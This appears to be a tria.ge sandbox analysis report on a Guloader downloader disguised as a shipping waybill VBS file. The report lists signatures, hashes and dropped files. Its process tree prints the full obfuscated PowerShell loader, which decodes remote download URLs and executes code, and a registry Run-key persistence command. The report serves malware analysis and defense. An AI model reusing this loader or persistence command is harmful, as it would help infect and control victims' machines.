Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

waybill_or...df.vbs

windows7-x64

10

waybill_or...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    22/08/2024, 12:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    waybill_original_invoice_bl_packing_list_shipment_22_08_2024_00000_pdf.vbs

  • Size

    134KB

  • MD5

    597c7745de1949be25d9c4849aa11cb7

  • SHA1

    e2001dadfe1233b12c11b8cc1954f9183633a4fb

  • SHA256

    31fc0e3296a248e9957c62e4060c92b895ca6ebb0a828e00ab7ef3608c498fb4

  • SHA512

    7bb22bc64793ec32363fc409f38830fc101222239a4ee58a97cbfcc00d19a06a5da5a18c3eead92f04f5a3c52505bdb2883f542479858dc2b84653d96d28c2ce

  • SSDEEP

    3072:FjGO63YDSdYB51Gy/ABuIWHwxoH0sHXaHb0bIkNTEx29Ojmplsz:NGO63WSdYB51Gy/quNHwaHdHqHb0bIko

Score
10/10
guloaderdiscoverydownloaderexecutionpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\waybill_original_invoice_bl_packing_list_shipment_22_08_2024_00000_pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2788
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Autogeneses199='SUBsTR';$Magmaen++;}$Autogeneses199+='ing';Function Brahmas($Tunder){$Misusurped=$Tunder.Length-$Magmaen;For( $imbroglios=2;$imbroglios -lt $Misusurped;$imbroglios+=3){$Dendrodic+=$Tunder.$Autogeneses199.'Invoke'( $imbroglios, $Magmaen);}$Dendrodic;}function Bromides($Hvlvingen){ & ($Krigserklringer) ($Hvlvingen);}$Vrdipakker=Brahmas 'AuMpuoUnz RiFal AlKaaHa/Se5Ru.Pr0Fr E(IlWStiKon,rdAuo owT.sSt .kN VT a Fo1Sy0,a.Je0 r;Te t.WMoi nVe6B.4Lo;Mi Ix p6An4 U;Ud Inr ovGa:Ho1 R2Fi1Lu.Fi0Pe) U S.G,oeTecE k.eoDi/ B2Cl0H 1.r0su0En1Tr0an1Mu LaF ri Kr.ee ofHyoV,xPa/ 1Pr2S,1Se.,i0Li ';$Afprvningsstrategierne=Brahmas ' eUUnsVeeK,rS.-EnAP,gO,eInn PtKa ';$Gillnetting=Brahmas 'soh Rt Ut Rpeps a:F /St/PrjT,aTeh.seP,z.i.T.mFie n/F,w ppu/ .Csna.ir .i PcIra ,tAguP,rGae.ndEm.SieBemSaz,y> hSotU,tGrpFl:Cy/Ha/F.cAtpS.aV n ,eChl M-E.a DdBom i tn Rh ,o.asRatNo. ScCooGlmSe/ uC iaC rBoiSkc Bap.tSku grOveDad O..leSemS.zCh ';$Bandar=Brahmas 'Pe> F ';$Krigserklringer=Brahmas 'rei.eeU xSu ';$Shwa='Balmain';$Aarens = Brahmas ',ee.ecGlhI oCi N%ReaOmpRopFadAla BtA aLe%Mi\ aPSarAroKaiA,n FqGnuH.i Ar ,yC . ,N,nuHol O Te&B &Ho Pee,ec .hFuoIm v,tPa ';Bromides (Brahmas 'Ud$Plgcil Go DbBaaTvl.i:.oP ,eOdrKriMac Ty Vt SiA a l.a=As(Trc Nm.ndGa ./Skc , Ln$ImA .aUnrDie TnD sMo) U ');Bromides (Brahmas ' ,$Nog,elK oTobHea.alRo:DeTS eNonStdopeCor rlfly =Mi$MaGQ iBelSklR,n le MtAlt,niT nDigt . MsSmpAnlhai,atS.(,e$N,B.xaUan,ndSkaGerS.)Le ');Bromides (Brahmas 'No[H.NI.eSkt,o.ViSOpeSyr,ivMaiGecDaeBeP roOki.enLatDeML aFoncea ,g teDir Q]Sk: a:ShSAreR cS u.arFoiJutMyyNoP er eo Et Fo AcSooFrlRe ,p=Al N[T.NAre ItM..GeS eArc ,uUar,riDet Ay .PB,rs,oButBaoP,cKuofalClTHoyMip,deW,]Ar:Ma: ,T Ul TsPr1U.2 ');$Gillnetting=$Tenderly[0];$Scarecrows184= (Brahmas 'Fo$ agkol,lo.obv.a PlUn:K.r oe Kg RnBes,pkPea MbEb=MeNSle.yw - SO ,bBrjReeBlc BtOv ,oS yB sdateseL m ,.TrN AeEnt,r. fW ,eOrbAfC EleririeHvnvat');$Scarecrows184+=$Pericytial[1];Bromides ($Scarecrows184);Bromides (Brahmas ' H$,tr.eeP gK nT,sFek ua GbBe.D,HuveDeaAld,reF rKosH.[Kv$ A ,f fpu rGev inA.ihsn,ng,ns LsCotU rMiaCat PeFig giVaeKarAxnb.eTy]Ba= ,$esV ar Od,niPrpSpaR.kHjkAre,ur l ');$Ethnolog=Brahmas 'Un$LirGie ,g UnJesGok,kaSpbFr. SD HoU.wRankolKoo,aaskd,uF HiUnlTveh.( T$PlGMoiPrlfolS nSpeBatK tKriTyn,rgLa,Su$TrS UaRecDirIdidaf GyC,)e. ';$Sacrify=$Pericytial[0];Bromides (Brahmas 'Tr$,ogChlheoSeb Aa ,lNa: GF AeA.uVadSuaBel ts ly Ascat Ge.hmCeeBot U5Fu8Af=Co(GeTTveFlsMitVk-CeP .aTrt AhF Pr$S,SBraDrcM.rT,iFuf.iy,p)ch ');while (!$Feudalsystemet58) {Bromides (Brahmas 'Fo$Gug BlSposebTra ,lP,:noPKoa enCutshe .bSmrHjeKrv Bssks .pDarU.gWisDam ,a oaJel .e ,tB =Cy$TetF,rDou .es. ') ;Bromides $Ethnolog;Bromides (Brahmas ' pS,htCraPrr ,tVa- SSDil ,ePreFopSe Kv4Ma ');Bromides (Brahmas 'F $ agImlSpo .b .a.glTu:E.F ,eV.uPld iaa l ls EyTes.etBaeTsmSle otUn5lu8Py=Tu(SlT eE.s,etCa- ,PMia .t,ihDy An$T.SPra,ic,krD iLaf.oy .)S, ') ;Bromides (Brahmas '.h$.jgMul.yonobF.aOplPe:UlFU i erMaeVrdD.a CmW.pIbsN.= e$ ,gMol.koSkbBaaEblsn: RSKah GrLiaBemBye.a+Ba+Bi%Su$ VTL eInn d De ErSwlL.yUn.TecSuo,ouInnTytbr ') ;$Gillnetting=$Tenderly[$Firedamps];}$Rovingness=333383;$Dannelsestrinnene=27637;Bromides (Brahmas 'Re$Krg cl eoV.bFjaGal f:EnB nuKanK.d PfLil,odTrnBuiRinHogA.eGlrTin Ie MsSa F= N eGh.eT t ,-S,COuoHonB.t eArns.tIn Be$HjS,aaBlcFer i BfKay B ');Bromides (Brahmas 'Br$ egB,lK oJub.ea Ll.i:,op OoMos tS.cSloDis Ct ZaG lN S,=Da An[ SS,dyGrsSetTje HmIn.AdCChoTanCovOreU,rNatTv]U : n:,rFHyr DoY.mk B ,aPrsFoeMe6 D4 oSD,tDor ,i .n,ugFe(.s$R,BD,utrnAfdS f,rl ,d.nnDuiUdnTlgMaeCerGlnPeevesKl)Ji ');Bromides (Brahmas ' L$ Tg,hlM,oLob,laBul W: UC.eu.msH tReo.amTaa obBal ceAm Ko=Af Se[MeSUnyP sTyt SeU.m.d. aT.ie ,x ,tU,.AnEC,nPlcSkoC dBeikinDeg ,]Fi: K:HeAQuSFoCSvI sIFa. .GDie OtH Sist.orEriChnPhgAm(.i$ Ap oo RsRetB cDvo SsAltSea,flof),o ');Bromides (Brahmas 'at$SygC.lM,oQub,oa.mlFo:.aOLalLieKir HaBicB,efoo MuSts D=An$SkCLyumasMatRnoD,mIna,pbfolJue a.Uns iuRobB.sAttTorCiiSknSeg ( .$ EREno ovBai cn,ogStnOpe .sMus ., E$niD ,a In XnTae ml Is PeFrs atSprH iPan unRee.jnsieMa)L, ');Bromides $Oleraceous;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proinquiry.Nul && echo t"
        3⤵
          PID:2556
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Autogeneses199='SUBsTR';$Magmaen++;}$Autogeneses199+='ing';Function Brahmas($Tunder){$Misusurped=$Tunder.Length-$Magmaen;For( $imbroglios=2;$imbroglios -lt $Misusurped;$imbroglios+=3){$Dendrodic+=$Tunder.$Autogeneses199.'Invoke'( $imbroglios, $Magmaen);}$Dendrodic;}function Bromides($Hvlvingen){ & ($Krigserklringer) ($Hvlvingen);}$Vrdipakker=Brahmas 'AuMpuoUnz RiFal AlKaaHa/Se5Ru.Pr0Fr E(IlWStiKon,rdAuo owT.sSt .kN VT a Fo1Sy0,a.Je0 r;Te t.WMoi nVe6B.4Lo;Mi Ix p6An4 U;Ud Inr ovGa:Ho1 R2Fi1Lu.Fi0Pe) U S.G,oeTecE k.eoDi/ B2Cl0H 1.r0su0En1Tr0an1Mu LaF ri Kr.ee ofHyoV,xPa/ 1Pr2S,1Se.,i0Li ';$Afprvningsstrategierne=Brahmas ' eUUnsVeeK,rS.-EnAP,gO,eInn PtKa ';$Gillnetting=Brahmas 'soh Rt Ut Rpeps a:F /St/PrjT,aTeh.seP,z.i.T.mFie n/F,w ppu/ .Csna.ir .i PcIra ,tAguP,rGae.ndEm.SieBemSaz,y> hSotU,tGrpFl:Cy/Ha/F.cAtpS.aV n ,eChl M-E.a DdBom i tn Rh ,o.asRatNo. ScCooGlmSe/ uC iaC rBoiSkc Bap.tSku grOveDad O..leSemS.zCh ';$Bandar=Brahmas 'Pe> F ';$Krigserklringer=Brahmas 'rei.eeU xSu ';$Shwa='Balmain';$Aarens = Brahmas ',ee.ecGlhI oCi N%ReaOmpRopFadAla BtA aLe%Mi\ aPSarAroKaiA,n FqGnuH.i Ar ,yC . ,N,nuHol O Te&B &Ho Pee,ec .hFuoIm v,tPa ';Bromides (Brahmas 'Ud$Plgcil Go DbBaaTvl.i:.oP ,eOdrKriMac Ty Vt SiA a l.a=As(Trc Nm.ndGa ./Skc , Ln$ImA .aUnrDie TnD sMo) U ');Bromides (Brahmas ' ,$Nog,elK oTobHea.alRo:DeTS eNonStdopeCor rlfly =Mi$MaGQ iBelSklR,n le MtAlt,niT nDigt . MsSmpAnlhai,atS.(,e$N,B.xaUan,ndSkaGerS.)Le ');Bromides (Brahmas 'No[H.NI.eSkt,o.ViSOpeSyr,ivMaiGecDaeBeP roOki.enLatDeML aFoncea ,g teDir Q]Sk: a:ShSAreR cS u.arFoiJutMyyNoP er eo Et Fo AcSooFrlRe ,p=Al N[T.NAre ItM..GeS eArc ,uUar,riDet Ay .PB,rs,oButBaoP,cKuofalClTHoyMip,deW,]Ar:Ma: ,T Ul TsPr1U.2 ');$Gillnetting=$Tenderly[0];$Scarecrows184= (Brahmas 'Fo$ agkol,lo.obv.a PlUn:K.r oe Kg RnBes,pkPea MbEb=MeNSle.yw - SO ,bBrjReeBlc BtOv ,oS yB sdateseL m ,.TrN AeEnt,r. fW ,eOrbAfC EleririeHvnvat');$Scarecrows184+=$Pericytial[1];Bromides ($Scarecrows184);Bromides (Brahmas ' H$,tr.eeP gK nT,sFek ua GbBe.D,HuveDeaAld,reF rKosH.[Kv$ A ,f fpu rGev inA.ihsn,ng,ns LsCotU rMiaCat PeFig giVaeKarAxnb.eTy]Ba= ,$esV ar Od,niPrpSpaR.kHjkAre,ur l ');$Ethnolog=Brahmas 'Un$LirGie ,g UnJesGok,kaSpbFr. SD HoU.wRankolKoo,aaskd,uF HiUnlTveh.( T$PlGMoiPrlfolS nSpeBatK tKriTyn,rgLa,Su$TrS UaRecDirIdidaf GyC,)e. ';$Sacrify=$Pericytial[0];Bromides (Brahmas 'Tr$,ogChlheoSeb Aa ,lNa: GF AeA.uVadSuaBel ts ly Ascat Ge.hmCeeBot U5Fu8Af=Co(GeTTveFlsMitVk-CeP .aTrt AhF Pr$S,SBraDrcM.rT,iFuf.iy,p)ch ');while (!$Feudalsystemet58) {Bromides (Brahmas 'Fo$Gug BlSposebTra ,lP,:noPKoa enCutshe .bSmrHjeKrv Bssks .pDarU.gWisDam ,a oaJel .e ,tB =Cy$TetF,rDou .es. ') ;Bromides $Ethnolog;Bromides (Brahmas ' pS,htCraPrr ,tVa- SSDil ,ePreFopSe Kv4Ma ');Bromides (Brahmas 'F $ agImlSpo .b .a.glTu:E.F ,eV.uPld iaa l ls EyTes.etBaeTsmSle otUn5lu8Py=Tu(SlT eE.s,etCa- ,PMia .t,ihDy An$T.SPra,ic,krD iLaf.oy .)S, ') ;Bromides (Brahmas '.h$.jgMul.yonobF.aOplPe:UlFU i erMaeVrdD.a CmW.pIbsN.= e$ ,gMol.koSkbBaaEblsn: RSKah GrLiaBemBye.a+Ba+Bi%Su$ VTL eInn d De ErSwlL.yUn.TecSuo,ouInnTytbr ') ;$Gillnetting=$Tenderly[$Firedamps];}$Rovingness=333383;$Dannelsestrinnene=27637;Bromides (Brahmas 'Re$Krg cl eoV.bFjaGal f:EnB nuKanK.d PfLil,odTrnBuiRinHogA.eGlrTin Ie MsSa F= N eGh.eT t ,-S,COuoHonB.t eArns.tIn Be$HjS,aaBlcFer i BfKay B ');Bromides (Brahmas 'Br$ egB,lK oJub.ea Ll.i:,op OoMos tS.cSloDis Ct ZaG lN S,=Da An[ SS,dyGrsSetTje HmIn.AdCChoTanCovOreU,rNatTv]U : n:,rFHyr DoY.mk B ,aPrsFoeMe6 D4 oSD,tDor ,i .n,ugFe(.s$R,BD,utrnAfdS f,rl ,d.nnDuiUdnTlgMaeCerGlnPeevesKl)Ji ');Bromides (Brahmas ' L$ Tg,hlM,oLob,laBul W: UC.eu.msH tReo.amTaa obBal ceAm Ko=Af Se[MeSUnyP sTyt SeU.m.d. aT.ie ,x ,tU,.AnEC,nPlcSkoC dBeikinDeg ,]Fi: K:HeAQuSFoCSvI sIFa. .GDie OtH Sist.orEriChnPhgAm(.i$ Ap oo RsRetB cDvo SsAltSea,flof),o ');Bromides (Brahmas 'at$SygC.lM,oQub,oa.mlFo:.aOLalLieKir HaBicB,efoo MuSts D=An$SkCLyumasMatRnoD,mIna,pbfolJue a.Uns iuRobB.sAttTorCiiSknSeg ( .$ EREno ovBai cn,ogStnOpe .sMus ., E$niD ,a In XnTae ml Is PeFrs atSprH iPan unRee.jnsieMa)L, ');Bromides $Oleraceous;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1920
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proinquiry.Nul && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:668
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3032
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "orthotoluic" /t REG_EXPAND_SZ /d "%smaakravls% -w 1 $knkortes=(Get-ItemProperty -Path 'HKCU:\brodserne\').Talemaaderne;%smaakravls% ($knkortes)"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1044
              • C:\Windows\SysWOW64\reg.exe
                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "orthotoluic" /t REG_EXPAND_SZ /d "%smaakravls% -w 1 $knkortes=(Get-ItemProperty -Path 'HKCU:\brodserne\').Talemaaderne;%smaakravls% ($knkortes)"
                6⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:444

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Cab3507.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2T09X1CJ75G7KE7F1JOL.temp
      Filesize

      7KB

      MD5

      b80c0018f090dd1f6148b7755e96ef89

      SHA1

      851100763d471642b253846365374e11ecbdea17

      SHA256

      e83ce35d6e7de02ae63a04dfb1bfde890ccccaab5a54aa52c38b13f693e1f441

      SHA512

      4ccb4185ea9194b2c018377894b19c5d24217bcc96a1d676092e75e859b32814e24bab3b6c34322907cf143b9f603a02ae0a58a04be74e7551a8a249ad113f78

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Proinquiry.Nul
      Filesize

      470KB

      MD5

      f281edfec822c81b42b6f27c0b83577f

      SHA1

      a0ec177606c5e3d4a03ca2e4467928154bd5b799

      SHA256

      4515af20d9dd633eba020c34280063ac55d22e6834ffa980bafebf47d3bcfb50

      SHA512

      9464d9a2a1aaf6348f2fd70b304c4fdb3aae95fa411b49121625f442ac4da5687f42cc8528040330de1f1a19285a7d051365133cf1919073fde0afba3859fe35

      Download Submit

    • memory/1920-35-0x0000000006540000-0x000000000830A000-memory.dmp

      Filesize

      29.8MB

      Download

    • memory/2752-22-0x00000000028E0000-0x00000000028E8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2752-24-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2752-25-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2752-26-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2752-27-0x000007FEF62FE000-0x000007FEF62FF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2752-28-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2752-23-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2752-21-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2752-20-0x000007FEF62FE000-0x000007FEF62FF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2752-41-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/3032-36-0x0000000000350000-0x00000000013B2000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/3032-38-0x00000000013C0000-0x000000000318A000-memory.dmp

      Filesize

      29.8MB

      Download